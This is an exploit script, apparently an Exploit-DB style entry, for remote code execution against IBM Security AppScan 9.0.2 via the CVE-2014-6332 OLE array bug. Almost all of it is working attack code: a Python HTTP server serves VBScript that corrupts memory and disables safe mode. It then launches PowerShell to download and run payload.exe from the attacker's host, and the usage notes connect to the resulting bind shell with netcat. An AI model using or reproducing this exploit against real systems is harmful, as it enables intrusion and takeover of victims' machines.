IBM Security AppScan 9.0.2 Remote Code Execution

`#!/usr/bin/python  
  
import BaseHTTPServer, socket  
  
##  
# IBM Security AppScan Standard OLE Automation Array Remote Code Execution  
#  
# Author: Naser Farhadi  
# Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909  
#  
# Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7  
#  
# Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/   
# if you able to exploit IE then you can exploit appscan and acunetix ;)  
# This Python Script Will Start A Sample HTTP Server On Attacker Machine And Serves Exploit Code And  
# Metasploit windows/shell_bind_tcp Executable Payload  
#  
# Usage:  
# chmod +x appscan.py  
# ./appscan.py  
# ...  
# nc 172.20.10.14 333  
#  
# Video: http://youtu.be/hPs1zQaBLMU  
##  
  
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):  
def do_GET(req):  
req.send_response(200)  
if req.path == "/payload.exe":  
req.send_header('Content-type', 'application/exe')  
req.end_headers()  
exe = open("payload.exe", 'rb')  
req.wfile.write(exe.read())  
exe.close()  
else:  
req.send_header('Content-type', 'text/html')  
req.end_headers()  
req.wfile.write("""Please scan me!  
<SCRIPT LANGUAGE="VBScript">  
function runmumaa()   
On Error Resume Next  
set shell=createobject("Shell.Application")  
command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/payload.exe',\  
'payload.exe');$(New-Object -com Shell.Application).ShellExecute('payload.exe');"  
shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0  
end function  
  
dim aa()  
dim ab()  
dim a0  
dim a1  
dim a2  
dim a3  
dim win9x  
dim intVersion  
dim rnda  
dim funclass  
dim myarray  
  
Begin()  
  
function Begin()  
On Error Resume Next  
info=Navigator.UserAgent  
  
if(instr(info,"Win64")>0) then  
exit function  
end if  
  
if (instr(info,"MSIE")>0) then   
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
else  
exit function   
  
end if  
  
win9x=0  
  
BeginInit()  
If Create()=True Then  
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)  
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)  
  
if(intVersion<4) then  
document.write("<br> IE")  
document.write(intVersion)  
runshellcode()   
else   
setnotsafemode()  
end if  
end if  
end function  
  
function BeginInit()  
Randomize()  
redim aa(5)  
redim ab(5)  
a0=13+17*rnd(6)  
a3=7+3*rnd(5)  
end function  
  
function Create()  
On Error Resume Next  
dim i  
Create=False  
For i = 0 To 400  
If Over()=True Then  
' document.write(i)   
Create=True  
Exit For  
End If   
Next  
end function  
  
sub testaa()  
end sub  
  
function mydata()  
On Error Resume Next  
i=testaa  
i=null  
redim Preserve aa(a2)   
  
ab(0)=0  
aa(a1)=i  
ab(0)=6.36598737437801E-314  
  
aa(a1+2)=myarray  
ab(2)=1.74088534731324E-310   
mydata=aa(a1)  
redim Preserve aa(a0)   
end function   
  
  
function setnotsafemode()  
On Error Resume Next  
i=mydata()   
i=readmemo(i+8)  
i=readmemo(i+16)  
j=readmemo(i+&h134)   
for k=0 to &h60 step 4  
j=readmemo(i+&h120+k)  
if(j=14) then  
j=0   
redim Preserve aa(a2)   
aa(a1+2)(i+&h11c+k)=ab(4)  
redim Preserve aa(a0)   
  
j=0   
j=readmemo(i+&h120+k)   
  
Exit for  
end if  
  
next   
ab(2)=1.69759663316747E-313  
runmumaa()   
end function  
  
function Over()  
On Error Resume Next  
dim type1,type2,type3  
Over=False  
a0=a0+a3  
a1=a0+2  
a2=a0+&h8000000  
  
redim Preserve aa(a0)   
redim ab(a0)   
  
redim Preserve aa(a2)  
  
type1=1  
ab(0)=1.123456789012345678901234567890  
aa(a0)=10  
  
If(IsObject(aa(a1-1)) = False) Then  
if(intVersion<4) then  
mem=cint(a0+1)*16   
j=vartype(aa(a1-1))  
if((j=mem+4) or (j*8=mem+8)) then  
if(vartype(aa(a1-1))<>0) Then   
If(IsObject(aa(a1)) = False ) Then   
type1=VarType(aa(a1))  
end if   
end if  
else  
redim Preserve aa(a0)  
exit function  
  
end if   
else  
if(vartype(aa(a1-1))<>0) Then   
If(IsObject(aa(a1)) = False ) Then  
type1=VarType(aa(a1))  
end if   
end if  
end if  
end if  
  
  
If(type1=&h2f66) Then   
Over=True   
End If   
If(type1=&hB9AD) Then  
Over=True  
win9x=1  
End If   
  
redim Preserve aa(a0)   
  
end function  
  
function ReadMemo(add)   
On Error Resume Next  
redim Preserve aa(a2)   
  
ab(0)=0   
aa(a1)=add+4   
ab(0)=1.69759663316747E-313   
ReadMemo=lenb(aa(a1))   
  
ab(0)=0   
  
redim Preserve aa(a0)  
end function  
  
</script>""")  
  
if __name__ == '__main__':  
sclass = BaseHTTPServer.HTTPServer  
server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)  
print "Http server started", socket.gethostbyname(socket.gethostname()), 80  
try:  
server.serve_forever()  
except KeyboardInterrupt:  
pass  
server.server_close()  
  
  
`